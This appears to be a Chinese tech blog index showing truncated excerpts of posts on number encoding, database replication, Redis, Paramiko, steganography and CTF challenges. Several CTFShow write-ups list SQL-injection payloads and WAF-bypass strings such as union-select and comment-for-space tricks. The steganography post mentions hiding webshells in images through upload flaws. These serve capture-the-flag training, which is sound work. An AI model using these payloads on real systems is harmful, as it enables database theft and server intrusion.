计算机原理
未读计算机中的信息表示 - 数据篇计算机以二进制(0和1) 作为底层信息存储与运算的基础,所有数据(数值、字符、图像等)最终都需转换为二进制形式。本文将从数值表示(原码、反码、补码)和字符编码(ASCII及扩展体系)两大核心维度,详解计算机如何“理解”数据。
一、数值表示:原码、反码与补码计算机处理数值时需区分正负,因此引入“符号位”(最高位,0表示正数,1表示负数)。原码、反码、补码是二进制数值的三种表示方式,核心差异在于负数的处理逻辑,最终补码因解决了原码/反码的缺陷,成为计算机实际使用的标准。
1. 原码(True Form)定义最高位为符号位(0正/1负),其余位(数值位)直接表示数值的绝对值。是最直观的二进制表示方式。
示例(8位系统,1字节=8位)
十进制数值
原码(二进制)
说明
+5
0000 0101
符号位0(正),数值位0101
-5
1000 0101
符号位1(负),数值位0101
+0
0000 0000
符号位0,数值位全0
-0
1000 0000
符号位1,数值位全0
核心问题
存在“+0”和“-0” ...
Web 181:过滤函数绕过(利用OR优先级)解题核心是在过滤函数中构造特殊语句,利用SQL中AND优先级高于OR的特性绕过限制。
关键Payload1-1'%0cor%0cusername%0clike%0c'flag
拼接后的SQL语句123select id,username,password from ctfshow_user where (username !='flag' and id = '" -1') %0cor%0c(username%0clike%0c'flag "' )limit 1;
过滤函数123function waf($str){ return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x00|\x0d|\xa0|\x23|\#|file|into|select/i', $str);}
另一个有效Payload1-1'||username='flag
...
CTFShow-web-vip/SQL 171-175(union注入)本文档整理CTFShow-web-vip板块中SQL 171-175题的Union注入解题思路,涵盖基础闭合、联合查询、WAF绕过、bool注入、文件导出等核心考点,每道题明确考点差异与关键步骤,代码与结果可视化结合,便于理解与复现。
web 171:基础SQL闭合注入考点
单引号闭合与注释绕过
排除条件username !='flag'的绕过
核心SQL语句(后端)1$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";
解题步骤
闭合测试与逻辑绕过利用or逻辑覆盖username !='flag'的限制,同时用注释符--+(URL中可替换为%23)注释后续SQL语句:
1234# 方法1:直接闭合+逻辑真?i ...
CTFShow-web-vip/SQL 176-180 解题笔记(Union注入专题)web 176:基础过滤探测题目分析题目提示对传入参数进行了简单过滤(waf($str) 代码未展示),核心目标是突破过滤并触发SQL注入。
注入思路
先使用基础万能密码探测注入点是否存在,验证参数是否可控。
若万能密码生效,说明过滤规则较简单,可进一步推进Union注入。
关键Payload1?id=' or 1=1 --+
作用:闭合原SQL语句的单引号,通过or 1=1使条件恒真,--+注释掉后续语句,实现“万能登录”或数据泄露。
web 177:/**/ 绕过空格过滤题目分析WAF过滤了空格,需用/**/(SQL注释符)替代空格,保证SQL语法合法。
注入步骤(手动复现)1. 验证注入点与字段数1?id=1'/**/union/**/select/**/1,2,3%23
说明:%23是URL编码的#,用于注释后续内容;返回结果若显示2或3,说明字段数为3且这两个位置可回显。
2. 查询数据库中的表名1?id=1'/**/un ...
DC-2靶场渗透实战:git提权+rbash逃逸+社工工具(cewl/wpscan)其他靶机
引用站外地址
DC-1靶场渗透测试-suid提权-Drupal 7-GetShell Kali-whatweb-nmap-arp使用
DC-2 靶场复现以及靶机分享(提权,信息收集)
引用站外地址
DC-4 靶场复现
DC-4 靶场复现以及靶机分享(提权,信息收集,shell反弹,爆破)
引用站外地址
DC-5 靶场复现
DC-5 靶机渗透 ...
飞牛 OS+iSCSI 实战:企业级存储方案从部署到调优全攻略(附避坑指南)一、准备工作在开始部署前,需提前准备以下工具与镜像文件,确保环境满足基础需求:
虚拟化软件:VMware Workstation(推荐 16.x 及以上版本,兼容性更优)
操作系统镜像:飞牛 OS 官方镜像,下载地址:飞牛OS下载地址
二、VMware 虚拟机创建2.1 新建虚拟机
打开 VMware Workstation,点击左上角「文件」→「新建虚拟机」,进入虚拟机向导界面。
选择「典型(推荐)」配置,点击「下一步」。
2.2 选择兼容版本在「虚拟机硬件兼容性」页面,选择与当前 VMware 版本匹配的兼容级别(如「Workstation 16.x」),点击「下一步」。
2.3 加载飞牛 OS 镜像
选择「安装程序光盘映像文件(ISO)」,点击「浏览」,选中已下载的飞牛 OS 镜像文件。
确认镜像路径无误后,点击「下一步」。
2.4 选择虚拟机存储位置
自定义虚拟机名称(如「FNOS-iSCSI-Server」),便于后续识别。
点击「浏览」选择存储路径(建议选择剩余空间充足的磁盘分区,至少预留 ...
1. 配置Redis集群在Redis集群中,3台节点的架构通常采用“一主二从+哨兵(Sentinel)”模式(或纯主从模式,哨兵用于自动故障转移),这是中小规模场景下平衡高可用、性能与成本的经典方案。以下从工作原理和核心优势以及安装方法三个方面详细说明:
一、3台Redis集群(一主二从+哨兵)工作原理3台节点的角色分工明确:1个主节点(Master) 负责写操作与数据同步,2个从节点(Slave) 负责读操作与数据备份,同时搭配哨兵集群(通常3个哨兵,可与Redis节点混部) 实现故障自动检测与转移。整体流程可拆解为4个核心机制:
1. 角色分工:主从节点的核心职责
角色
数量
核心职责
主节点(Master)
1
1. 接收所有写请求(SET、DEL、HSET等)并执行;2. 记录写操作到“复制积压缓冲区”,供从节点同步;3. 不主动处理读请求(客户端可配置读主,但通常不推荐)。
从节点(Slave)
2
1. 接收主节点同步的全量/增量数据,保持与主节点数据一致;2. 接收所有读请求(GET、HGET等),分担主节点读压力;3. 主节点故障时,作为“候选主 ...
第二届帕鲁杯应急响应分支 - 畸行的爱一、环境解压与密码
环境解压密码
1Parloo&zgsfsys&onefox&solar**juyt
二、靶机配置修改解压完文件后,需完成以下两项配置修改,确保靶机正常运行:
修改VMX虚拟机配置文件编辑每个靶机的vmx配置文件,将virtualHW.version = “21”改为17(具体版本需根据自身VMware版本调整)。
修改NAT网络段“畸行的爱”共包含4台靶机,需将所有靶机的NAT网络统一改为192.168.87段。
三、靶机整体信息1. 单台虚拟机配置
2. 整体拓扑结构
3. 靶机文件哈希信息123456文件: 畸形的爱.7z大小: 18865734297 字节修改时间: 2025年5月2日, 15:57:47MD5: 79DD66A3C4A90317441943D88D018987SHA1: CC63B63C7D782BE96DC8EBEAD624F82C68D5515BCRC32: 634F9B36
四、题目列表
序号
题目描述
答案/状态
2
攻击者I ...
主从备份(含双主模式)梳理一、核心概念与场景适配主从备份是数据库高可用方案的基础,核心通过“主库写入+从库同步/读取”实现负载分担与数据冗余。不同模式适配不同业务场景:
模式
核心特点
适配场景
局限性
一主一从
主库写、从库读;单向同步,无数据冲突
读多写少(如博客、电商详情页)
主库故障需手动切换,写入易瓶颈
双主模式
双库均支持写;双向同步,需解决冲突
写压力较大(如订单、日志系统)
架构复杂,需处理ID冲突与数据一致性
二、双主模式 vs 一主一从:优劣势对比双主模式是一主一从的进阶方案,核心优势围绕“写入可用性”与“负载分散”,但需承担更高复杂度。
1. 优势:双主模式更优的场景
写入高可用性更强双主互为主从,任一节点故障时,另一节点可直接接管写入(无需手动提升从库),服务中断时间极短;一主一从需通过工具(如MHA)或手动切换主从,存在明显延迟。
写入负载可分散可按业务拆分写入(如A业务写主库1,B业务写主库2),避免单一主库的写入瓶颈;一主一从所有写入依赖主库,高并发(如秒杀)易导致主库过载。
维护更灵活维护其中一个节点(如升级、全量备份) ...
数据库安全
未读MySQL 主从同步(主从复制)配置指南一、什么是MySQL主从复制?MySQL主从复制是一种数据同步机制,通过让一台MySQL服务器(主库,Master)将数据变更复制到一台或多台MySQL服务器(从库,Slave),实现多节点数据一致性。
其核心价值在于:
高可用性:主库故障时,可快速切换到从库,避免服务中断;
读写分离:主库负责写操作(INSERT/UPDATE/DELETE),从库负责读操作(SELECT),减轻主库压力;
数据备份:从库可作为异地备份节点,避免主库数据丢失风险;
横向扩展:通过增加从库数量,提升读操作并发能力。
二、主从复制基本原理MySQL主从同步基于二进制日志(binlog) 和中继日志(relay log) 实现,默认采用异步复制模式。
2.1 核心组件
组件
所在节点
作用描述
二进制日志(binlog)
主库
记录主库所有数据变更操作(SQL语句或行数据),是同步的“数据源”。
I/O线程
从库
连接主库,读取主库的binlog内容,并写入从库本地的“中继日志”。
中继日志(relay log)
从 ...
应急响应部分1. 资源链接与说明
百度网盘链接:https://pan.baidu.com/s/1am2UEH1Djcu1IcujxuHDGQ?pwd=7179
解压密码:Network@@ZGSF&One-FoxSelfTeam
涉及机器说明以下是需要的机器,由于时间跨度较长,JumpServer的策略可能会删除部分日志(不确定)。实际操作中存在日志文件缺失的情况,尝试重新安装后问题未解决,相关机器截图如下:
2. 题目列表
找到JumpServer堡垒机中flag标签的值。
提交攻击者第一次登录时间。
提交攻击者源IP。
提交攻击者使用的cve编号。
提交攻击者留在Web服务器上的恶意程序的32位小写md5值。
分析恶意程序连接地址和密码。
提交存在反序列化漏洞的端口。
提交攻击者使用的后门路由地址。
提交dnslog反弹域名。
提交第一次扫描器使用时间。
提交攻击者反弹shell使用的语言。
提交攻击者反弹shell的ip。
提交攻击者留下的账号。
提交攻击者的后门账户密码。
提交测试数据条数。
请提交攻击者留下的信息。
请提交运维服务器上的恶意文件md5。
提 ...
1. Paramiko 概述1.1 什么是 ParamikoParamiko 是 Python 中用于实现 SSH2 协议的第三方库,核心能力覆盖远程运维场景的关键需求,包括:
远程命令执行(如批量执行 shell 命令)
安全文件传输(基于 SFTP 协议)
端口转发与隧道(实现跨网络服务访问)
RSA/DSA 密钥认证(替代密码登录,提升安全性)
1.2 核心功能模块
模块/类
功能描述
SSHClient
封装 SSH 会话,管理连接建立、命令执行流程
SFTPClient
提供 SFTP 协议接口,支持文件上传/下载/删除
Transport
底层连接管理,支持连接复用、协议扩展
Channel
SSH 通道对象,实现交互式会话或端口转发
RSAKey/DSSKey
处理 RSA/DSS 密钥的生成、加载与验证
1.3 工作流程
建立连接:通过 SSHClient() 初始化客户端对象
认证方式:支持三种认证模式(密码认证、密钥认证、混合认证)
执行操作:根据需求调用命令执行、文件传输 ...
一、穿梭隐藏的密钥(代码审计)在一次惊心动魄的太空任务中,你发现了一个隐藏在偏远太空站内部的高度机密的加密密钥。这个密钥可能拥有解锁重要情报的能力,但获取它需要绕过多重安全防护,利用专业知识突破层层难关。
1.1 初始页面分析(Challenge One 前置)查看页面源代码,核心逻辑如下:
12345678910111213141516171819202122232425262728293031323334353637<body oncontextmenu="return false"> <div id="text">click to me,Baby</div> <script> // 禁用F12快捷键 document.addEventListener('keydown', function(event) { if (event.key === 'F12') { event.preventDef ...
CTFShow-西瓜杯-你是我的眼1. 工具准备与运行
引用站外地址
jadx-gui
28.7分析Java反编译工具
引用站外地址
cyberchef
28.7分享cyberchef
本题需使用jadx-gui(Java反编译工具)分析题目代码,具体操作步骤如下:
提前安装jadx-gui工具(版本1.4.4及以上);
进入工具的lib目录;
执行以下命令启动jadx-gui:1java -jar jadx-gui-1.4.4.jar
将下载的题目文件导入jadx-gui中,即可查看反编译后的Java代码。
2. 题目代码分析导入后得到的核心代码如下,需重点分析编码逻辑和flag校验逻 ...
Thinkphp8创建QQ邮箱通知器准备项目
Thinkphp8 需要php8上
需要QQ邮箱中生成的Key
需要安装驱动 phpmailer
申请QQ邮箱的keyQQ邮箱点击设置到最低的账号与安全,点击安全设置后生成授权码,记住这个KEY,后面需要
准备Tp8的驱动以及配置文件1composer require phpmailer/phpmailer
创建 config\email.php,需要
12345678910111213141516<?php //+---------------------------------------------------------------------- //| qq邮箱配置 //+----------------------------------------------------------------------return [ 'Host' => 'smtp.qq.com', //不变 ...
一、为什么有MISC?在网络安全领域,除了框架漏洞、版本漏洞、代码逻辑漏洞等常见漏洞类型外,还存在隐写类关卡。这类技术通过特殊手段,将敏感/违规内容隐藏在图片、文本、压缩包、视频、音频等载体深处,规避常规检测,是CTF-MISC方向及实际攻击场景中的重要技术分支。
二、图片隐写技术详解图片是隐写技术中最常用的载体(格式兼容性强、肉眼不易察觉异常),以下从「用途→具体技术→工具/脚本」展开讲解。
2.1 图片隐藏信息的核心用途
规避肉眼审查:多数平台设有人工审核机制,隐藏后的信息从图片表面无异常,可绕过人工检查。
规避敏感词过滤:直接传递文字易被平台敏感词系统拦截,通过图片隐写可将敏感内容“伪装”为普通图片。
网站挂马与漏洞利用:结合文件上传漏洞(如Apache/Nginx版本漏洞、Session竞争),将webshell等恶意代码隐写进图片,实现服务器控制。
维护公司形象, 入侵不仅仅包含主机渗透,还涉及文化渗透,譬如,制作幻影坦克图,而审核若不仔细审核,当用户点击时,会影响公司形象甚至带来用户流失
2.2 基础信息隐藏:二进制缝合与十六进制编辑这类方法 ...
















